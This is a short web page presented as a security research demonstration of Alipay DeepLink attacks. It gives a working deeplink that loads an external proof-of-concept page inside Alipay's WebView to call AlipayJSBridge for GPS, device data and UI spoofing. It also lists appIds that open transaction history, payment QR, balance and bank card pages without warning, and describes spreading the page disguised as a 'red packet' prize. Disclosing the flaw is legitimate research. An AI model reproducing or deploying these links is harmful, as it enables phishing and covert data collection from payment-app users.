Alipay DeepLink Attack Demo

Security Research Trigger Page | innora.ai

SECURITY RESEARCH DEMONSTRATION
This page simulates how an attacker would distribute malicious DeepLinks via SMS/WeChat/QQ. In a real attack, this page would be disguised as a "red packet" or "prize claim" page.

Buttons below trigger Alipay DeepLinks. On a device with Alipay installed, clicking will open Alipay directly.

Full report: innora.ai/zfb

CRITICAL Attack Chain A: JSBridge Exploitation

Opens Alipay WebView and loads our PoC page which calls AlipayJSBridge APIs to collect GPS, device info, and demonstrate UI spoofing.

Chain A: JSBridge PoC (Android Chrome)
alipays://platformapi/startapp?appId=20000067&url=https://innora.ai/zfb/poc/verify.html

HIGH Attack Chain B: Zero-Interaction DeepLinks

These DeepLinks open sensitive Alipay pages directly. No additional warning is shown.

Transaction History (appId=20000003) Transfer Contacts (appId=20000116) Payment QR Code (appId=20000123) Yu'E Bao Balance (appId=20000032) Security Settings (appId=20000052) Bank Card Management (appId=20000193)

How This Works

1. Attacker distributes this page via SMS/WeChat/QQ (disguised as "red packet")
2. Victim clicks a button in their mobile browser
3. Browser triggers intent:// scheme which opens Alipay
4. For Chain A: Alipay loads attacker's page in WebView with AlipayJSBridge injected
5. For Chain B: Alipay navigates directly to sensitive page, no extra warning

Innora AI Security Research | Full Report | feng@innora.ai

This is a security research demonstration. Use responsibly.